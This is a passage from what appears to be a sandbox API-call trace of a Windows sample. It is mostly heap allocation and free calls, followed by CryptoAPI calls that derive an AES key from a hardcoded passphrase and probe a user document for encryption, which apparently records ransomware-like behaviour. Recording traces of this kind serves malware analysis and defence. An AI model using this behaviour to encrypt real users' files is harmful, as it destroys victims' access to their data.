lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0082.741] FreeLibrary (hLibModule=0x772d0000) returned 1 [0082.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0082.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0082.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0082.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0082.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0082.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0082.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0082.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0082.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0082.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0082.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0082.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0082.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0082.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0082.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0082.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0082.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0082.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0082.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0082.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0082.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0082.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0082.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0082.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0082.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0082.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0082.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3a8 | out: hHeap=0x1780000) returned 1 [0082.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0082.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0082.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0082.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0082.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0082.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0082.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0082.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0082.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4bf0 | out: hHeap=0x1780000) returned 1 [0082.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0082.743] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0082.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0082.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0082.743] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0082.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0082.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0082.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0082.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0082.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0082.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0082.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0082.743] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0082.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0082.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0082.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0082.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0082.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0082.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0082.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0082.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0082.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0082.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0082.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0082.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0082.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0082.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0082.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0082.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0082.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0082.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0082.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0082.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0082.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0082.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0082.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0082.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0082.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0082.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35c0 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3608 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0082.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0082.746] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43cb2a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0082.746] CloseHandle (hObject=0x298) returned 1 [0082.746] FreeLibrary (hLibModule=0x772d0000) returned 1 [0082.746] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0082.747] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\HUjUtG60c TddWcmy.rtf", lpFindFileData=0x144e3c8 | out: lpFindFileData=0x144e3c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66e55450, ftCreationTime.dwHighDateTime=0x1d5f10a, ftLastAccessTime.dwLowDateTime=0x54035490, ftLastAccessTime.dwHighDateTime=0x1d5e6d3, ftLastWriteTime.dwLowDateTime=0x54035490, ftLastWriteTime.dwHighDateTime=0x1d5e6d3, nFileSizeHigh=0x0, nFileSizeLow=0x16ff1, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="HUjUtG60c TddWcmy.rtf", cAlternateFileName="HUJUTG~1.RTF")) returned 0x41ac780 [0082.747] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0082.747] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0082.747] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.747] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0082.759] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.759] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0082.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0082.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0082.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796d68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0082.759] CryptAcquireContextA (in: phProv=0x144e0a8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e0a8*=0x41a4f20) returned 1 [0082.760] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0082.760] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0082.760] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0082.760] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0082.760] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.760] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0082.760] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.760] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0082.761] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0082.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43c37b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0082.761] CryptCreateHash (in: hProv=0x41a4f20, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144de18 | out: phHash=0x144de18) returned 1 [0082.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0082.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0082.761] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0082.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0082.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0082.761] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.761] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0082.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43c3638, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0082.761] CryptHashData (hHash=0x41ac000, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0082.761] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.762] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0082.762] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0082.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43c35c0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0082.762] CryptDeriveKey (in: hProv=0x41a4f20, Algid=0x6610, hBaseData=0x41ac000, dwFlags=0x1, phKey=0x144de18 | out: phKey=0x144de18*=0x41ac040) returned 1 [0082.762] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.762] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0082.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0082.762] CryptDestroyHash (hHash=0x41ac000) returned 1 [0082.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0082.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0082.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d10 [0082.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c39f8 [0082.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3968 [0082.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c39e0 [0082.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0082.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3a40 [0082.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c38f0 [0082.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3b30 [0082.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0082.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0082.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0082.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3818 [0082.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b90 [0082.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36f8 [0082.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cc0 [0082.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0082.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cc0 [0082.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0082.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0082.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0082.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0082.764] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0082.764] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0082.764] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b90 [0082.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0082.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0082.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c90 [0082.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0082.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0082.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0082.765] 